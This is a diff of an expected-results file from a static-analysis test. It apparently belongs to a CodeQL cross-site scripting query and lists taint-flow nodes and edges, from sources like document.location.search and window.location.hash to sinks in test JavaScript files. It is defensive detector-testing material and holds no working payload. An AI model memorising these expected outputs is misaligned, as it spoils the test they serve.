    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:4:18:4:23 | target | semmle.label | target | +| tst.js:6:18:6:126 | "" | semmle.label | "" | +| tst.js:6:37:6:58 | documen ... on.href | semmle.label | documen ... on.href | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:6:37:6:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | +| tst.js:9:5:9:42 | '
    ' | semmle.label | '
    ' | +| tst.js:9:28:9:33 | target | semmle.label | target | +| tst.js:14:7:14:56 | params | semmle.label | params | +| tst.js:14:7:14:56 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | +| tst.js:14:16:14:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:14:25:14:41 | document.location | semmle.label | document.location | +| tst.js:15:18:15:23 | params | semmle.label | params | +| tst.js:15:18:15:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:15:18:15:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:17:7:17:61 | searchParams | semmle.label | searchParams | +| tst.js:17:7:17:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:17:22:17:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... 
ing(1)) [MapValue] | +| tst.js:17:42:17:47 | target | semmle.label | target | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:17:42:17:60 | target.substring(1) | semmle.label | target.substring(1) | +| tst.js:18:18:18:29 | searchParams | semmle.label | searchParams | +| tst.js:18:18:18:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | +| tst.js:18:18:18:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | +| tst.js:21:14:21:19 | target | semmle.label | target | +| tst.js:22:18:22:23 | target | semmle.label | target | +| tst.js:24:5:24:28 | documen ... .search | semmle.label | documen ... .search | +| tst.js:27:10:27:33 | documen ... .search | semmle.label | documen ... .search | +| tst.js:29:16:29:20 | bar() | semmle.label | bar() | +| tst.js:31:14:31:14 | x | semmle.label | x | +| tst.js:32:10:32:10 | x | semmle.label | x | +| tst.js:34:16:34:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | +| tst.js:34:20:34:43 | documen ... .search | semmle.label | documen ... .search | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:36:15:36:15 | s | semmle.label | s | +| tst.js:37:10:37:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:37:20:37:20 | s | semmle.label | s | +| tst.js:39:16:39:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | +| tst.js:39:21:39:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:41:15:41:15 | s | semmle.label | s | +| tst.js:43:12:43:12 | s | semmle.label | s | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:43:12:43:22 | s.substr(1) | semmle.label | s.substr(1) | +| tst.js:46:16:46:45 | chop(do ... search) | semmle.label | chop(do ... search) | | tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... 
search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... 
.search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... 
Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... 
hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... 
.search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... 
bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:9:28:9:30 | loc | semmle.label | loc | | typeahead.js:10:16:10:18 | loc | semmle.label | loc | | typeahead.js:20:13:20:45 | target | semmle.label | target | @@ -831,8 +831,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | jwt.js:4:36:4:39 | data | jwt.js:5:30:5:33 | data | provenance | | | jwt.js:5:9:5:34 | decoded | jwt.js:6:14:6:20 | decoded | provenance | | | jwt.js:5:19:5:34 | jwt_decode(data) | jwt.js:5:9:5:34 | decoded | provenance | | 
